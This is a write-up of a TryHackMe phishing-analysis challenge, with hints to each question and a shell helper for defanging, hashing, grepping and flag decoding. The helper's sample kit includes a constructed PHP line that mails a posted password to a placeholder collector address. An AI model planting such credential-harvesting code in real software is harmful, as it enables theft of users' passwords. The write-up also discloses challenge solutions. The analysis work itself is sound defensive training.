Write-up: "Snapped Phish-ing Line" TryHackMe challenge | https://tryhackme.com/room/snappedphishingline
- Who is the individual who received an email attachment containing a PDF?
- Just open the phish-emails folder and review all the emails :)
- What email address was used by the adversary to send the phishing emails?
- See the "FROM" line in the mail.
- What is the redirection URL to the phishing page for the individual Zoe Duncan? (defanged format)
- Use CyberChef to defang the URL:
You just need to look at the source code of the .html phishing file to get the redirection URL.
- What is the URL to the .zip archive of the phishing kit? (defanged format)
- Just enumerate the website:
Use CyberChef to defang the URL.
- What is the SHA256 hash of the phishing kit archive?
- Download the .zip archive, open a terminal and run sha256sum on the file.
- When was the phishing kit archive first submitted? (format: YYYY-MM-DD HH:MM:SS UTC)
- Use the well-known site https://www.virustotal.com, submit the hash of the .zip archive and go to the right section to get the answer ;)
- When was the phishing domain that was used to host the phishing kit archive first registered? (format: YYYY-MM-DD)
- Generally I use https://urlscan.io/, but I did not find the answer there, so use https://threatbook.io/
- What was the email address of the user who submitted their password twice?
- When you enumerate the website you can see a log.txt; search in this file.
- What was the email address used by the adversary to collect compromised credentials?
- Open the .zip archive and look for the right file to get the answer (the clue is in the "Validation" folder, in a .php file).
- The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in "@gmail.com"?
- Unzip the .zip archive and run a simple grep command with -r in this folder.
- What is the hidden flag?
- When you enumerate the website you find a flag.txt file.
Base64? Yeah, just decode it :)
(; noitcerid thgir eht ni srettel eht tup
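The manual steps above (defang the URL, hash the archive, grep the unzipped kit for addresses, decode the base64 flag and flip it) collected into one small shell triage helper, as an added example that is not part of the original write-up or the room. The phishing-kit directory, the addresses and the flag value it uses are constructed placeholders, not the room's data.

```shell
# Constructed triage helper for the steps in this write-up; all paths,
# addresses and the flag below are placeholders, not the room's files.

# Defang a URL so it cannot be clicked by accident: http -> hxxp, "." -> "[.]"
defang() {
    printf '%s\n' "$1" | sed -e 's|^http|hxxp|' -e 's/\./[.]/g'
}

# SHA256 of a file, hash only (the value you would look up on VirusTotal)
sha256_of() {
    sha256sum "$1" | cut -d' ' -f1
}

# Every unique e-mail address found anywhere under a directory (the grep -r step)
emails_in() {
    grep -rhoE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' "$1" | sort -u
}

# Reverse a string with awk (portable, no dependency on rev)
reverse() {
    printf '%s\n' "$1" | awk '{ s = ""; for (i = length($0); i > 0; i--) s = s substr($0, i, 1); print s }'
}

# flag.txt in the room is base64 of reversed text: decode, then reverse
decode_flag() {
    reverse "$(printf '%s' "$1" | base64 -d)"
}

# Build a constructed phishing-kit directory to run the helpers against
make_sample_kit() {
    dir=$(mktemp -d)
    mkdir -p "$dir/Validation"
    # constructed collector address in the "Validation" .php, as the write-up describes
    printf '<?php mail("collector@example.com", "creds", $_POST["pw"]); ?>\n' > "$dir/Validation/verify.php"
    printf '// constructed second drop address: second.drop@example.com\n' > "$dir/Validation/config.php"
    # constructed flag: reversed, then base64-encoded, like the room's flag.txt
    printf '%s' "$(reverse 'THM{constructed_example}')" | base64 > "$dir/flag.txt"
    printf '%s' "$dir"
}

kit=$(make_sample_kit)
echo "defanged:  $(defang 'http://phish.example.com/kit.zip')"
echo "addresses: $(emails_in "$kit" | tr '\n' ' ')"
echo "flag:      $(decode_flag "$(cat "$kit/flag.txt")")"
```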
Thanks Orzykf and TryHackMe for this fun challenge!